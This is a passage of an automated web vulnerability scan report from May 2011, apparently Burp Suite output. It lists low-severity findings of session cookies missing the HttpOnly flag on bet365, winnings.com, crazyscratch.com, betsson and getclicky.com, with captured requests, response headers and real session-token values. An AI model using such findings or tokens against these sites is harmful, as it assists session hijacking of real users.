<head id="
...[SNIP]...

12.7. http://casino.bet365.com/extra/en/online-games/live-dealer

Summary

Severity:   Low
Confidence:   Firm
Host:   http://casino.bet365.com
Path:   /extra/en/online-games/live-dealer

Issue detail

Cookies issued by the application (see the Set-Cookie headers in the response below) do not have the HttpOnly flag set. One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /extra/en/online-games/live-dealer HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:25 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bwkilnzzw312lbao5zygnc3u; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=AE7AAAF18ED44B4CA0DFD512563D0E3F000002; path=/
Set-Cookie: session=stk=AE7AAAF18ED44B4CA0DFD512563D0E3F000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:25 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:25 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:32:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 93559


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...

12.8. http://casino.bet365.com/extra/en/online-games/roulette

Summary

Severity:   Low
Confidence:   Firm
Host:   http://casino.bet365.com
Path:   /extra/en/online-games/roulette

Issue detail

Cookies issued by the application (see the Set-Cookie headers in the response below) do not have the HttpOnly flag set. One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /extra/en/online-games/roulette HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:24 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kcnaqt55ip33v1nmqm3ozt45; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=08ACA4CA6B6B4BC394152B73FAC0A82C000002; path=/
Set-Cookie: session=stk=08ACA4CA6B6B4BC394152B73FAC0A82C000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:24 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:24 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:32:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 85710


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...

12.9. http://casino.bet365.com/home/en/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://casino.bet365.com
Path:   /home/en/

Issue detail

Cookies issued by the application (see the Set-Cookie headers in the response below) do not have the HttpOnly flag set. One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/en/ HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:23 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5xuac3551kzj4cm3dpese255; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=840278C39B9946C182A492B2D9FF91B8000002; path=/
Set-Cookie: session=stk=840278C39B9946C182A492B2D9FF91B8000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:22 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:22 GMT; path=/
Set-Cookie: LandingVisited=True; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:32:23 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 227712


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...

12.10. http://da.crazyscratch.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://da.crazyscratch.com
Path:   /

Issue detail

A cookie issued by the application (see the Set-Cookie header in the response below) does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: da.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16448
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCARSTDDC=JBNNJMIAHMINGLJOBEHEKAJG; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:31:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.11. http://da.winnings.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://da.winnings.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: da.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=82gun5s9aot32rckk6dr6ngt71; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=da; expires=Wed, 15-Jun-2011 12:26:09 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:26:09 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=da; expires=Wed, 15-Jun-2011 12:26:09 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123277; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540655; expires=Tue, 15-May-2012 12:26:10 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:26:11 GMT
Connection: close
Content-Length: 23111

<!DOCTYPE html>
<html dir="ltr" lang="da">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - Det bedste sted for SJOV online underholdning med gevinster!..| Winnings.com</title>
<link rel="
...[SNIP]...

12.12. http://de.crazyscratch.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://de.crazyscratch.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: de.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18626
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACRRSDCC=BEDLBLIAHMGKLDCOEOIHGGKL; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:32:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.13. http://de.winnings.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://de.winnings.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: de.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=bo2hr723r5jhqb7k8l55c0tsp6; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=de; expires=Wed, 15-Jun-2011 12:00:01 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:00:01 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=de; expires=Wed, 15-Jun-2011 12:00:01 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103122867; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540255; expires=Tue, 15-May-2012 12:00:03 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:00:04 GMT
Connection: close
Content-Length: 23256

<!DOCTYPE html>
<html dir="ltr" lang="de-DE">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - Top-Destination für SPASS Online Winnings Unterhaltung!..| Winnings.com</title>
<link rel="a
...[SNIP]...

12.14. http://el.crazyscratch.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://el.crazyscratch.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: el.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28375
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCRRQDCC=FOMFJMIALPNODOAGMPEJOAIG; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:31:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.15. http://el.winnings.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://el.winnings.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: el.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=m2prtrifja8qi72631j36fguj0; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=el; expires=Wed, 15-Jun-2011 12:08:42 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:08:42 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=el; expires=Wed, 15-Jun-2011 12:08:42 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123004; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540388; expires=Tue, 15-May-2012 12:08:44 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:08:47 GMT
Connection: close
Content-Length: 24824

<!DOCTYPE html>
<html dir="ltr" lang="el">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - .. #1 .................... ...... .................... ...... .................. .... ..........
...[SNIP]...

12.16. http://en.crazyscratch.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://en.crazyscratch.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: en.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18921
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCQSSDCC=IABHDNIANOMHCONFDHMFEEBD; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:44:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.17. http://es.crazyscratch.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://es.crazyscratch.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: es.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16677
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCRRQCCC=IOPLANIADMGNMLBCGHMNMEDC; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:35:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.18. http://es.winnings.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://es.winnings.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: es.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=6rfpoaacmos3pqv6u74edo7v02; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=es; expires=Wed, 15-Jun-2011 12:32:12 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:32:12 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=es; expires=Wed, 15-Jun-2011 12:32:12 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123528; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540903; expires=Tue, 15-May-2012 12:32:13 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:32:15 GMT
Connection: close
Content-Length: 23226

<!DOCTYPE html>
<html dir="ltr" lang="es-ES">
<head>
<meta charset="UTF-8" />

<title>Winnings.com. ¡El destino nº 1 para la DIVERSIÓN y ganancias online!..| Winnings.com</title>
<link rel="a
...[SNIP]...

12.19. http://fi.crazyscratch.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://fi.crazyscratch.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: fi.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18619
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAARQQDCC=NGCNCBIAHNMGKJGFAHJGJHCA; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:32:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.20. http://fi.winnings.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://fi.winnings.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: fi.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=hhfnpksu4siu4pfgu3cjt3vs45; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=fi; expires=Wed, 15-Jun-2011 12:10:54 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:10:54 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=fi; expires=Wed, 15-Jun-2011 12:10:54 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123051; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540431; expires=Tue, 15-May-2012 12:10:55 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:10:56 GMT
Connection: close
Content-Length: 23175

<!DOCTYPE html>
<html dir="ltr" lang="fi">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - Ykköspaikka HAUSKALLE netin Winnings -viihteelle!..| Winnings.com</title>
<link rel="alternate
...[SNIP]...

12.21. http://fr.crazyscratch.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://fr.crazyscratch.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: fr.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17049
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACRSTADC=MPHFNLIADMMJPCONDIALEPBN; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:25:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.22. http://fr.winnings.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://fr.winnings.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: fr.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=ct2se4ekv495kv3bi8qnrrbis5; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=fr; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=fr; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123274; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540651; expires=Tue, 15-May-2012 12:26:04 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:26:05 GMT
Connection: close
Content-Length: 23634

<!DOCTYPE html>
<html dir="ltr" lang="fr-FR">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - La Destination #1 pour du Divertissement Gagnant En Ligne !..| Winnings.com</title>
<link r
...[SNIP]...

12.23. http://games.bet365.com/en/scratchcards/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://games.bet365.com
Path:   /en/scratchcards/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/scratchcards/ HTTP/1.1
Host: games.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:02:15 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rbfdlb45oeclse550xfm3c45; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=9C2C33F10D514043B2DACC213223040E000002; path=/
Set-Cookie: session=stk=9C2C33F10D514043B2DACC213223040E000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:02:14 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:02:14 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:02:15 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 75482


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...

12.24. http://games.bet365.com/home/en/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://games.bet365.com
Path:   /home/en/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/en/ HTTP/1.1
Host: games.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:02:20 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=jqaokq45oa00yd45k1sqtdbv; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=7FFFF94400DA44DBABA668D6BF938444000002; path=/
Set-Cookie: session=stk=7FFFF94400DA44DBABA668D6BF938444000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:02:19 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:02:19 GMT; path=/
Set-Cookie: LandingVisited=True; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:02:19 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 338090


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...

12.25. http://getclicky.com/66384109

Summary

Severity:   Low
Confidence:   Firm
Host:   http://getclicky.com
Path:   /66384109

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /66384109 HTTP/1.1
Host: getclicky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:45:21 GMT
Server: Apache
P3P: CP='NOI DSP COR CUR OUR NID NOR'
Set-Cookie: PHPSESSID=8adbf56b6cdc8626904763e06aeaa6ad; path=/
Cache-Control: must-revalidate, no-cache
Set-Cookie: referer=66372715; expires=Fri, 15 Jul 2011 12:45:21 GMT; path=/; domain=.getclicky.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46672

<!doctype html>
<html>
<head>
<title>Web Analytics in Real Time | Clicky</title>
<meta name="description" content="Clicky Web Analytics is simply the best way to monitor, analyze, and react to your bl
...[SNIP]...

12.26. https://help.betsson.com/display/4/kb/faq/index.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   https://help.betsson.com
Path:   /display/4/kb/faq/index.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /display/4/kb/faq/index.aspx HTTP/1.1
Host: help.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 16 May 2011 12:02:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /index.aspx
Set-Cookie: ASP.NET_SessionId=qiv3sin4m5umjyaekpf4yp55; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 128

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/index.aspx'>here</a>.</h2>
</body></html>

12.27. http://hu.crazyscratch.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://hu.crazyscratch.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: hu.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18194
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAAQRQCCD=BFHPCOIAGFLFGBMJJMBHDPFH; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:45:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...

12.28. http://it.crazyscratch.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://it.crazyscratch.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: it.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
